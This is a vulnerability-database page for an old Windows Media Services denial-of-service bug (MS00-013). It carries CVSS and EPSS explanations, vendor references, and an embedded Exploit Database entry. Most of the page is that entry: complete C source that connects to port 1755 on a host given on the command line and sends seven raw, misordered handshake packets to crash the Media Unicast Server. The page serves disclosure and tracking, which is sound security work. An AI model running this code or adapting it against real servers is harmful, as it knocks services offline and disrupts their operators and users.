Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The Windows Media server allows remote attackers to cause a denial of service via a series of client handshake packets that are sent in an improper sequence, aka the "Misordered Windows Media Services Handshake" vulnerability.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19759
Publication date : 2000-01-17 23h00 +00:00
Author : Kit Knox
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/1000/info
// Misordered handshake sequences sent to a Windows Media Unicast Server via Windows Media Player will cause the server to crash. Restarting the Unicast Service, including any open sessions during the time of the crash, is required in order to regain normal functionality. This is due to the dependency of the application on successfully completing asychronous handshake requests in a proper sequential order between the client and the server.
/*
*
* Jan-18-2000
*
* [ http://www.rootshell.com/ ]
*
* Microsoft Media Server 4.1 - Denial of Service Attack
*
* This code will crash the Microsoft Media Unicast Server for
* Windows NT. We have tested this against machines running SP4
* and SP6.
*
* We have seen the entire machine become very unstable following
* the crash of the unicast server.
*
* Notified secure@microsoft.com Jan-18-2000 at 11:30 AM.
* Microsoft advisory released Feb-23-2000.
*
* http://www.microsoft.com/technet/security/bulletin/fq00-013.asp
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
char packet1[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0xa0, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40, 0x12, 0x00, 0x00, 0x00,
0x01, 0x00, 0x03, 0x00, 0xf0, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00,
0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50, 0x00, 0x6c, 0x00,
0x61, 0x00, 0x79, 0x00, 0x65, 0x00, 0x72, 0x00, 0x2f, 0x00, 0x34, 0x00,
0x2e, 0x00, 0x31, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20, 0x00, 0x7b, 0x00,
0x30, 0x00, 0x32, 0x00, 0x64, 0x00, 0x30, 0x00, 0x63, 0x00, 0x32, 0x00,
0x63, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64, 0x00, 0x32, 0x00,
0x2d, 0x00, 0x39, 0x00, 0x61, 0x00, 0x61, 0x00, 0x38, 0x00, 0x2d, 0x00,
0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37, 0x00, 0x65, 0x00,
0x7d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
char packet2[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x5e, 0xba, 0x49, 0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00
};
char packet3[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x83, 0xc0, 0xca, 0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff, 0xff, 0xff, 0xff,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa0, 0x00, 0x02, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00,
0x32, 0x00, 0x5c, 0x00, 0x54, 0x00, 0x43, 0x00, 0x50, 0x00, 0x5c, 0x00,
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
0x63, 0x00, 0x30, 0x00
};
char packet4[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x2b, 0x87, 0x16, 0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x68, 0x00,
0x65, 0x00, 0x20, 0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65, 0x00, 0x71, 0x00,
0x75, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x61, 0x00, 0x20, 0x00, 0x53, 0x00,
0x75, 0x00, 0x6e, 0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f, 0x00, 0x65, 0x00,
0x61, 0x00, 0x67, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x73, 0x00, 0x32, 0x00,
0x38, 0x00, 0x2e, 0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00
};
char packet5[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x67, 0x66, 0x66, 0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
0x65, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00
};
char packet6[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x0a, 0xd7, 0xa3, 0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
0x00, 0x00, 0xff, 0xff, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
0x65, 0x00, 0x20, 0x00
};
char packet7[] = {
0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38, 0x00, 0x00, 0x00,
0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
0x2f, 0xdd, 0x24, 0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00
};
int sock;
int main(int argc, char *argv[]) {
struct hostent *he;
struct sockaddr_in sa;
char buf[1024];
if (argc != 2) {
fprintf(stderr, "usage: %s <host/ip>\n", argv[0]);
return(-1);
}
sock = socket ( AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons(1755);
he = gethostbyname (argv[1]);
if (!he) {
if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
return(-1);
} else {
bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
}
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
fprintf(stderr, "Fatal Error: Can't connect to Microsoft Media Server.\n");
return(-1);
}
write(sock, packet1, sizeof(packet1));
write(sock, packet2, sizeof(packet2));
write(sock, packet3, sizeof(packet3));
write(sock, packet4, sizeof(packet4));
write(sock, packet5, sizeof(packet5));
write(sock, packet6, sizeof(packet6));
write(sock, packet7, sizeof(packet7));
for (;;) {
read(sock, buf, sizeof(buf));
}
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_media_services >> Version 4.0
- Microsoft>>Windows_media_services >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_media_services >> Version 4.1
- Microsoft>>Windows_media_services >> Version 4.1 (Open CPE detail)
References
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-013
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
